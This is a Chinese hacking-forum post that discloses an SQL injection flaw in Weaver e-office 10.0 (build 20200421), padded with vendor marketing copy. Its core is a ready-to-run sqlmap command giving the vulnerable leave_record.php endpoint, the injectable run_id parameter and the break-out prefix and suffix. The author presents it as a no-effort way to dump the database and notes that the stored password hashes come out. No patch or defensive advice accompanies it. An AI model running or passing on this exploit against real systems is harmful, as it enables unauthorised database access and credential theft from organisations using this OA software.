查看: 24648|回复: 0

泛微eoffice10-20200421注入漏洞

[复制链接]
发表于 2021-8-13 19:06:26 | 显示全部楼层 |阅读模式
泛微品牌影响力:

20年 专注OA的研发创新
OA软件领域 首家 主板上市公司
协同行业 “国家 重点 软件企业”
全国 200多个 本地化服务机构
中国高端移动办公协同OA的专业厂商


  泛微e-office深谙改革之道以迎变革之机,沉心产品研发数十载之久,全新产品e-office10.0正式上线,力求为用户提供更极致、更优质的产品体验。
  e-office10.0无论是在安全性、扩展性还是智能性方面,都进行了一次完美蜕变。在原版本基础上,V10.0主要具有10项优势。
  全新上线的e-office10.0在产品性能上做了进一步提升,无论是在安全性、扩展性还是智能性方面,都进行了一次完美蜕变。

漏洞存在的版本:
V10.0-20200421
QQ截图20210813184746.jpg

注入点位置:
[PHP] 纯文本查看 复制代码
python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id


PS:table_field=*也可以

放进sqlmap直接跑就可以,无门槛~
缺陷是跑出来的密文无法解密,蛋疼的很
QQ截图20210813185315.jpg
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 05:22 , Processed in 0.028521 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部